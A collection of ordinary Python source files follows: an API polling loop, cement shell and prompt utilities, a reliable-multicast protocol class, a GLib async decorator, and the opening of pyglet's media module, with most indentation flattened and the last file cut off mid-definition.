myapi : GetAPI = GetAPI()
myapi.login()
while(1):
print("\033[1;34m[INFO]\033[0m Update DATA")
myapi.run()
time.sleep(60)
global stop_threads
if stop_threads:
break
"""
Code allowing to start thread and reset cookies one time by days
"""
while(1):
print("\033[1;34m[INFO]\033[0m Start application !")
x : threading.Thread = threading.Thread(target=getapi_thread,args=())
x.start()
time.sleep(86400)
    stop_threads = True
x.join()
print("\033[1;34m[INFO]\033[0m Reset of cookies")
    stop_threads = False
|
shell.py
|
"""Common Shell Utilities."""
import os
import sys
from subprocess import Popen, PIPE
from multiprocessing import Process
from threading import Thread
from ..core.meta import MetaMixin
from ..core.exc import FrameworkError
def exec_cmd(cmd_args, *args, **kw):
"""
Execute a shell call using Subprocess. All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The (stdout, stderror, return_code) of the command.
:rtype: tuple
Usage:
.. code-block:: python
from cement.utils import shell
stdout, stderr, exitcode = shell.exec_cmd(['echo', 'helloworld'])
"""
if 'stdout' not in kw.keys():
kw['stdout'] = PIPE
if 'stderr' not in kw.keys():
kw['stderr'] = PIPE
proc = Popen(cmd_args, *args, **kw)
(stdout, stderr) = proc.communicate()
proc.wait()
return (stdout, stderr, proc.returncode)
def exec_cmd2(cmd_args, *args, **kw):
"""
    Similar to exec_cmd, however it does not capture stdout or stderr (therefore
    allowing output to print to the console). All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The integer return code of the command.
:rtype: int
Usage:
.. code-block:: python
from cement.utils import shell
exitcode = shell.exec_cmd2(['echo', 'helloworld'])
"""
proc = Popen(cmd_args, *args, **kw)
proc.wait()
return proc.returncode
def spawn_process(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around multiprocessing.Process(). By default the start()
function will be called before the spawned process object is returned.
See `MultiProcessing
<https://docs.python.org/2/library/multiprocessing.html>`_ for more
information on the features of `Process()`.
:param target: The target function to execute in the sub-process.
:param start: Call start() on the process before returning the process
object.
:param join: Call join() on the process before returning the process
object. Only called if start=True.
:param args: Additional arguments are passed to Process().
:param kwargs: Additional keyword arguments are passed to Process().
:returns: The process object returned by Process().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
p = shell.spawn_process(add, args=(12, 27))
p.join()
"""
proc = Process(target=target, *args, **kwargs)
if start and not join:
proc.start()
elif start and join:
proc.start()
proc.join()
return proc
def spawn_thread(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around threading.Thread(). By default the start()
function will be called before the spawned thread object is returned
See `Threading
<https://docs.python.org/2/library/threading.html>`_ for more
information on the features of `Thread()`.
:param target: The target function to execute in the thread.
:param start: Call start() on the thread before returning the thread
object.
:param join: Call join() on the thread before returning the thread
object. Only called if start=True.
:param args: Additional arguments are passed to Thread().
:param kwargs: Additional keyword arguments are passed to Thread().
:returns: The thread object returned by Thread().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
t = shell.spawn_thread(add, args=(12, 27))
t.join()
"""
thr = Thread(target=target, *args, **kwargs)
if start and not join:
thr.start()
elif start and join:
thr.start()
thr.join()
return thr
class Prompt(MetaMixin):
"""
A wrapper around `raw_input` or `input` (py3) whose purpose is to limit
    the redundant tasks of gathering user input. Can be used in several ways
depending on the use case (simple input, options, and numbered
selection).
:param text: The text displayed at the input prompt.
Usage:
Simple prompt to halt operations and wait for user to hit enter:
.. code-block:: python
p = shell.Prompt("Press Enter To Continue", default='ENTER')
.. code-block:: text
$ python myapp.py
Press Enter To Continue
$
Provide a numbered list for longer selections:
.. code-block:: python
p = Prompt("Where do you live?",
options=[
'San Antonio, TX',
'Austin, TX',
'Dallas, TX',
'Houston, TX',
],
numbered = True,
)
.. code-block:: text
Where do you live?
1: San Antonio, TX
2: Austin, TX
3: Dallas, TX
4: Houston, TX
Enter the number for your selection:
Create a more complex prompt, and process the input from the user:
.. code-block:: python
class MyPrompt(Prompt):
class Meta:
text = "Do you agree to the terms?"
options = ['Yes', 'no', 'maybe-so']
options_separator = '|'
default = 'no'
clear = True
max_attempts = 99
def process_input(self):
if self.input.lower() == 'yes':
# do something crazy
pass
else:
# don't do anything... maybe exit?
print("User doesn't agree! I'm outa here")
sys.exit(1)
MyPrompt()
.. code-block:: text
$ python myapp.py
[TERMINAL CLEAR]
Do you agree to the terms? [Yes|no|maybe-so] no
User doesn't agree! I'm outa here
$ echo $?
$ 1
"""
class Meta:
"""
Optional meta-data (can also be passed as keyword arguments to the
parent class).
"""
        #: The text that is displayed to prompt the user
        text = "Tell me something interesting:"
#: A default value to use if the user doesn't provide any input
default = None
#: Options to provide to the user. If set, the input must match one
#: of the items in the options selection.
options = None
#: Separator to use within the option selection (non-numbered)
options_separator = ','
#: Display options in a numbered list, where the user can enter a
#: number. Useful for long selections.
numbered = False
#: The text to display along with the numbered selection for user
#: input.
selection_text = "Enter the number for your selection:"
#: Whether or not to automatically prompt() the user once the class
#: is instantiated.
auto = True
#: Whether to treat user input as case insensitive (only used to
#: compare user input with available options).
case_insensitive = True
#: Whether or not to clear the terminal when prompting the user.
clear = False
#: Command to issue when clearing the terminal.
clear_command = 'clear'
#: Max attempts to get proper input from the user before giving up.
max_attempts = 10
#: Raise an exception when max_attempts is hit? If not, Prompt
#: passes the input through as `None`.
max_attempts_exception = True
def __init__(self, text=None, *args, **kw):
if text is not None:
kw['text'] = text
super(Prompt, self).__init__(*args, **kw)
self.input = None
if self._meta.auto:
self.prompt()
def _prompt(self):
if self._meta.clear:
os.system(self._meta.clear_command)
text = ""
if self._meta.options is not None:
if self._meta.numbered is True:
text = text + self._meta.text + "\n\n"
count = 1
for option in self._meta.options:
text = text + "%s: %s\n" % (count, option)
count += 1
text = text + "\n"
text = text + self._meta.selection_text
else:
sep = self._meta.options_separator
text = "%s [%s]" % (self._meta.text,
sep.join(self._meta.options))
else:
text = self._meta.text
if sys.version_info[0] < 3: # pragma: nocover # noqa
self.input = raw_input("%s " % text) # pragma: nocover # noqa
else: # pragma: nocover # noqa
self.input = input("%s " % text) # pragma: nocover # noqa
if self.input == '' and self._meta.default is not None:
self.input = self._meta.default
elif self.input == '':
self.input = None
def prompt(self):
"""
Prompt the user, and store their input as `self.input`.
"""
attempt = 0
while self.input is None:
if attempt >= int(self._meta.max_attempts):
if self._meta.max_attempts_exception is True:
raise FrameworkError("Maximum attempts exceeded getting "
"valid user input")
else:
return self.input
attempt += 1
self._prompt()
if self.input is None:
continue
elif self._meta.options is not None:
if self._meta.numbered:
try:
self.input = self._meta.options[int(self.input) - 1]
except (IndexError, ValueError) as e:
self.input = None
continue
else:
if self._meta.case_insensitive is True:
lower_options = [x.lower()
for x in self._meta.options]
if not self.input.lower() in lower_options:
self.input = None
continue
else:
if self.input not in self._meta.options:
self.input = None
continue
self.process_input()
return self.input
def process_input(self):
"""
Does not do anything. Is intended to be used in a sub-class to handle
user input after it is prompted.
"""
pass
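# Illustrative sketch (not part of cement): build a Prompt with auto=False so that
# prompting happens explicitly, then normalise the validated answer. The helper
# name below is hypothetical.
def _example_confirm():
    p = Prompt("Proceed?", options=['yes', 'no'], default='no', auto=False)
    answer = p.prompt()
    return answer is not None and answer.lower() == 'yes'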
|
reliable_multicast.py
|
import socket
import struct
import threading
import time
import select
from src.core.utils.configuration import Configuration
from src.core.signatures.signatures import Signatures
from src.core.group_view.group_view import GroupView
from src.core.utils.channel import Channel
from src.protocol.multicast.piggyback import PiggybackMessage
from src.protocol.multicast.heartbeat import HeartBeat
from src.protocol.multicast.nack import NegativeAcknowledgement
from src.protocol.base import Message
class ReliableMulticast:
def __init__(
self,
multicast_addr: str,
multicast_port: int,
identifier: str,
channel: Channel,
group_view: GroupView,
configuration: Configuration,
open: bool = False,
):
self._S_p = 0 # local sender sequence number
self._R_g: dict[str, int] = {identifier: -1} # delivered sequence numbers
self._max_R_g: dict[str, int] = {} # max delivered sequence number registered by heartbeat
self._holdback_queue: dict[str, dict[int, str]] = {identifier: {}}
self._storage: dict[str, list[str]] = {}
        self._requested_messages: dict[str, list[int]] = {}
self._holdback_queue_lock = threading.Lock()
self._R_g_lock = threading.Semaphore()
self._response_channel = Channel()
self._multicast_addr = multicast_addr
self._multicast_port = multicast_port
self._identifier = identifier
self._channel = channel
self._group_view = group_view
self._configuration = configuration
self._open = open
if self._group_view is not None:
self._signature = Signatures(group_view.sk, self._group_view.identifier)
self._setup_multicast_listener()
self._setup_udp_sock()
self._storage = {identifier: []}
self._timeoffset = time.time_ns() / 10**9
self._last_msg_sent_ts = 0
self._suspend_multicast = False
self._contraint_multicast = False
self.terminate = False
self.listening_thread = None
self.heartbeat_thread = None
def _setup_multicast_listener(self):
# create listener socket
self._multicast_listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        # Allow multiple clients and servers to run on a single (host, port)
self._multicast_listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Enable broadcasting mode
self._multicast_listener.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self._multicast_listener.bind(("", self._multicast_port))
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(self._multicast_addr)
mreq = struct.pack("4sL", group, socket.INADDR_ANY)
self._multicast_listener.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def _setup_udp_sock(self):
self._udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._udp_sock.bind(("", 0))
def send(self, message: Message, config=False, sign=True):
if not message.is_decoded:
message.decode()
if not self._suspend_multicast or config:
with self._R_g_lock:
pb_message = PiggybackMessage.initFromMessage(message, self._identifier, self._S_p, self._R_g)
pb_message.encode()
if sign:
pb_message.sign(self._signature)
self._last_msg_sent_ts = time.time_ns() / 10**9
self._udp_sock.sendto(
pb_message.json_data.encode(), (self._multicast_addr, self._multicast_port)
)
response = self._deliver(pb_message.json_data, self._identifier, self._S_p)
self._check_holdback_queue()
self._S_p += 1
if not self._response_channel.is_empty():
response, config = self._response_channel.consume()
response_msg = Message.initFromJSON(response)
self.send(response_msg, config)
else:
if not message.is_encoded:
message.encode()
self._response_channel.produce((message.json_data, False))
def _send_unicast(self, message: Message, addr: tuple[str, int]):
if not message.is_encoded:
message.encode()
self._udp_sock.sendto(message.json_data.encode(), addr)
def _send_nack(self, messages, addr):
nack = NegativeAcknowledgement.initFromData(messages)
nack.encode()
nack.sign(self._signature)
self._send_unicast(nack, addr)
def start(self, listen=True, trash=False):
if trash:
self._response_channel.set_trash_flag(True)
self.terminate = False
if self.listening_thread is None or not self.listening_thread.is_alive():
if listen and not self._open:
self.listening_thread = threading.Thread(target=self._listen)
elif listen and self._open:
self.listening_thread = threading.Thread(target=self._listen_open)
else:
self.listening_thread = threading.Thread(target=self._listen_for_nacks)
self.listening_thread.start()
self.heartbeat_thread = threading.Thread(target=self._heartbeat)
self.heartbeat_thread.start()
def stop(self):
self.terminate = True
if self.heartbeat_thread is not None:
self.heartbeat_thread.join()
self.heartbeat_thread = None
if self.listening_thread is not None:
self.listening_thread.join()
self.listening_thread = None
def disable_responses(self):
self._response_channel.set_trash_flag(True)
def enable_responses(self):
self._response_channel.set_trash_flag(False)
def _heartbeat(self):
interval = self._configuration.get_heartbeat_interval()
while not self.terminate:
time.sleep(interval)
ts = time.time_ns() / 10**9
# if ts - self._last_msg_sent_ts <= 5*interval:
heartbeat = HeartBeat.initFromData(self._R_g)
heartbeat.encode()
if not self._open:
heartbeat.sign(self._signature)
self._udp_sock.sendto(
heartbeat.json_data.encode(),
(self._multicast_addr, self._multicast_port),
)
def _listen(self):
while not self.terminate:
ready_socks, _, _ = select.select([self._udp_sock, self._multicast_listener], [], [])
for sock in ready_socks:
data, addr = sock.recvfrom(1024)
data = data.decode()
msg = Message.initFromJSON(data)
msg.decode()
sender_id, _ = msg.get_signature()
if msg.header == "HeartBeat":
self._receive_heartbeat(data, addr)
else:
if msg.verify_signature(self._signature, self._group_view.pks):
if msg.header == "NACK":
if not self._group_view.check_if_server_is_suspended(sender_id):
self._receive_nack(data, addr)
else:
if sock == self._udp_sock or not self._group_view.check_if_server_is_suspended(
sender_id
):
self._receive_pb_message(data, addr)
def _listen_open(self):
while not self.terminate:
ready_socks, _, _ = select.select([self._udp_sock, self._multicast_listener], [], [])
for sock in ready_socks:
data, addr = sock.recvfrom(1024)
data = data.decode()
msg = Message.initFromJSON(data)
msg.decode()
if msg.header == "HeartBeat":
self._receive_heartbeat(data, addr)
elif msg.header == "NACK":
if msg.verify_signature(self._signature, self._group_view.pks):
sender_id, _ = msg.get_signature()
if not self._group_view.check_if_server_is_inactive(sender_id):
self._receive_nack(data, addr)
else:
msg = PiggybackMessage.initFromJSON(data)
msg.decode()
if msg.seqno == 0 or msg.verify_signature(self._signature, self._group_view.users):
msg.set_sender(addr)
msg.encode()
data = msg.json_data
self._receive_pb_message(data, addr)
def _listen_for_nacks(self):
while not self.terminate:
ready_socks, _, _ = select.select([self._udp_sock], [], [])
for sock in ready_socks:
data, addr = sock.recvfrom(1024)
data = data.decode()
msg = Message.initFromJSON(data)
msg.decode()
if msg.header == "NACK":
self._receive_nack(data, addr)
def _receive_heartbeat(self, data, addr):
heartbeat = HeartBeat.initFromJSON(data)
heartbeat.decode()
self._handle_acks(heartbeat.acks, addr, {})
def _receive_nack(self, data, addr):
nack = NegativeAcknowledgement.initFromJSON(data)
nack.decode()
for identifier in nack.nacks:
if identifier in self._storage:
for seqno in nack.nacks[identifier]:
if seqno >= len(self._storage[identifier]):
break
nack_response = PiggybackMessage.initFromJSON(self._storage[identifier][seqno])
self._send_unicast(nack_response, addr)
def _receive_pb_message(self, data, addr):
pb_message = PiggybackMessage.initFromJSON(data)
pb_message.decode()
if pb_message.identifier == self._identifier:
return
# only accept old messages of suspended servers
if (
self._group_view.check_if_server_is_suspended(pb_message.identifier)
and pb_message.seqno > self._max_R_g[pb_message.identifier]
):
return
nack_messages = {}
check_responses = False
if pb_message.identifier not in self._storage:
self._storage[pb_message.identifier] = []
self._R_g[pb_message.identifier] = -1
self._holdback_queue[pb_message.identifier] = {}
self._requested_messages[pb_message.identifier] = [0, -1]
if pb_message.seqno == self._R_g[pb_message.identifier] + 1:
# message can be delivered instantly
self._deliver(data, pb_message.identifier, pb_message.seqno)
self._check_holdback_queue()
check_responses = True
elif pb_message.seqno > self._R_g[pb_message.identifier] + 1:
# there are missing messages => store message in holdback queue
with self._holdback_queue_lock:
self._holdback_queue[pb_message.identifier][pb_message.seqno] = data
if (
self._requested_messages[pb_message.identifier][0]
+ self._configuration.get_heartbeat_interval()
< time.time_ns() / 10**9
):
self._requested_messages[pb_message.identifier][1] = self._R_g[pb_message.identifier]
# send nacks
missing_messages = list(
set(
range(
self._requested_messages[pb_message.identifier][1] + 1,
pb_message.seqno,
)
)
- set(self._holdback_queue[pb_message.identifier].keys())
)
if len(missing_messages) != 0:
nack_messages[pb_message.identifier] = missing_messages
self._handle_acks(pb_message.acks, addr, nack_messages)
if check_responses:
if not self._response_channel.is_empty():
response, config = self._response_channel.consume()
response_msg = Message.initFromJSON(response)
self.send(response_msg, config)
def _handle_acks(self, acks, addr, nack_messages):
# send nacks if detecting missing messages
for ack in acks:
if ack in self._group_view.servers:
if ack not in self._max_R_g or (acks[ack] > self._max_R_g[ack]):
self._max_R_g[ack] = acks[ack]
if ack != self._identifier:
if ack not in self._storage:
self._storage[ack] = []
self._R_g[ack] = -1
self._holdback_queue[ack] = {}
self._requested_messages[ack] = [0, -1]
if (
self._requested_messages[ack][0] + self._configuration.get_heartbeat_interval()
< time.time_ns() / 10**9
):
self._requested_messages[ack][1] = self._R_g[ack]
missing_messages = list(
set(range(self._requested_messages[ack][1] + 1, acks[ack] + 1))
- set(self._holdback_queue[ack].keys())
)
if len(missing_messages) != 0:
nack_messages[ack] = missing_messages
if len(nack_messages) > 0:
nack_count = sum([len(nack_messages[identifier]) for identifier in nack_messages])
if nack_count > 100:
for identifier in nack_messages:
l = len(nack_messages[identifier])
nack_messages[identifier] = nack_messages[identifier][: int(100 * l / nack_count)]
for identifier in nack_messages:
l = len(nack_messages[identifier])
if l > 0:
self._requested_messages[identifier][0] = time.time_ns() / 10**9
self._requested_messages[identifier][1] = max(
self._requested_messages[identifier][1],
nack_messages[identifier][-1],
)
self._send_nack(nack_messages, addr)
def _deliver(self, data, identifier, seqno):
if self._channel is not None:
self._channel.produce(data)
self._update_storage(data, identifier, seqno)
def _update_storage(self, data, identifier, seqno):
# update storage and acks
self._storage[identifier].append(data)
self._R_g[identifier] = seqno
if identifier != self._identifier:
self._requested_messages[identifier][0] = time.time_ns() / 10**9
self._requested_messages[identifier][1] = max(seqno, self._requested_messages[identifier][1])
def _check_holdback_queue(self):
change = True
while change:
change = False
for identifier in self._holdback_queue:
next_seqno = self._R_g[identifier] + 1
while next_seqno in self._holdback_queue[identifier]:
self._deliver(
self._holdback_queue[identifier][next_seqno],
identifier,
next_seqno,
)
next_seqno += 1
change = True
# remove stale elements of the holdback queue
with self._holdback_queue_lock:
for identifier in self._holdback_queue:
stale_messages = [
stale_seqno
for stale_seqno in self._holdback_queue[identifier]
if stale_seqno <= self._R_g[identifier]
]
for stale_message in stale_messages:
del self._holdback_queue[identifier][stale_message]
def halt_sending(self):
self._suspend_multicast = True
def continue_sending(self):
self._suspend_multicast = False
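# Standalone sketch of the gap-detection logic used in _receive_pb_message and
# _handle_acks above: the NACK set is the range of expected sequence numbers
# minus what is already buffered in the holdback queue. The function name and
# arguments below are illustrative, not part of the class.
def _example_missing_seqnos(last_delivered, incoming_seqno, holdback_seqnos):
    expected = set(range(last_delivered + 1, incoming_seqno))
    return sorted(expected - set(holdback_seqnos))
# e.g. _example_missing_seqnos(2, 7, {4, 5}) -> [3, 6]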
|
asyncf.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# async.py
#
# This file is part of uPodcatcher
#
# Copyright (C) 2014
# Lorenzo Carbonell Cerezo <lorenzo.carbonell.cerezo@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gi
try:
gi.require_version('GLib', '2.0')
except Exception as e:
print(e)
exit(1)
from gi.repository import GLib
import threading
import traceback
__all__ = ['async_function']
def _async_call(f, args, kwargs, on_done):
def run(data):
f, args, kwargs, on_done = data
error = None
result = None
try:
result = f(*args, **kwargs)
except Exception as e:
e.traceback = traceback.format_exc()
            error = 'Unhandled exception in async call:\n{}'.format(e.traceback)
GLib.idle_add(lambda: on_done(result, error))
data = f, args, kwargs, on_done
thread = threading.Thread(target=run, args=(data,))
thread.daemon = True
thread.start()
def async_function(on_done=None):
'''
A decorator that can be used on free functions so they will always be
called asynchronously. The decorated function should not use any resources
shared by the main thread.
Example:
def do_async_stuff(self, input_string):
def on_async_done(result, error):
# Do stuff with the result and handle errors in the main thread.
if error:
print(error)
elif result:
print(result)
@async_function(on_done=on_async_done)
def do_expensive_stuff_in_thread(input_string):
# Pretend to do expensive stuff...
time.sleep(10)
stuff = input_string + ' Done in a different thread'
return stuff
do_expensive_stuff_in_thread(input_string)
'''
def wrapper(f):
def run(*args, **kwargs):
_async_call(f, args, kwargs, on_done)
return run
return wrapper
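# Minimal runnable sketch (an assumption for illustration, not part of the
# original module): run a blocking task in a worker thread via the decorator
# above and quit a GLib main loop once the on_done callback fires.
def _example_async_roundtrip():
    loop = GLib.MainLoop()

    def on_done(result, error):
        print(error if error else result)
        loop.quit()

    @async_function(on_done=on_done)
    def work():
        return 'done in a worker thread'

    work()
    loop.run()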
|
__init__.py
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id$
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class implements the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import StringIO
import pyglet
_debug = pyglet.options['debug_media']
_profile = pyglet.options['profile_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
if pyglet.options['debug_trace']:
pyglet._install_trace()
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
        The `stopped` instance variable is set to ``True`` and the condition is
        notified. It is the responsibility of the `run` method to check
        the value of `stopped` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.notify()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
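# Example (illustrative): 16-bit stereo audio at 44.1 kHz gives
#   bytes_per_sample = (16 >> 3) * 2 = 4
#   bytes_per_second = 4 * 44100 = 176400
# i.e. AudioFormat(channels=2, sample_size=16, sample_rate=44100).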
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
`frame_rate` : float
Frame rate (frames per second) of the video.
AVbin 8 or later is required, otherwise the frame rate will be
``None``.
**Since:** pyglet 1.2.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
self.frame_rate = None
class AudioData(object):
'''A single packet of audio data.
This class is used internally by pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
            # faster than fudging around with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
def get_string_data(self):
'''Return data as a string.'''
if type(self.data) is str:
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
        # Meaning of timestamp is dependent on context, and is not seen by
        # the application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
pyglet.app.platform_event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
class SourceInfo(object):
'''Source metadata information.
Fields are the empty string or zero if the information is not available.
:Ivariables:
`title` : str
Title
`author` : str
Author
`copyright` : str
Copyright statement
`comment` : str
Comment
`album` : str
Album name
`year` : int
Year
`track` : int
Track number
`genre` : str
Genre
:since: pyglet 1.2
'''
title = ''
author = ''
copyright = ''
comment = ''
album = ''
year = 0
track = 0
genre = ''
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
`info` : `SourceInfo`
Source metadata such as title, artist, etc; or None if the
information is not available.
**Since:** pyglet 1.2
'''
_duration = None
audio_format = None
video_format = None
info = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
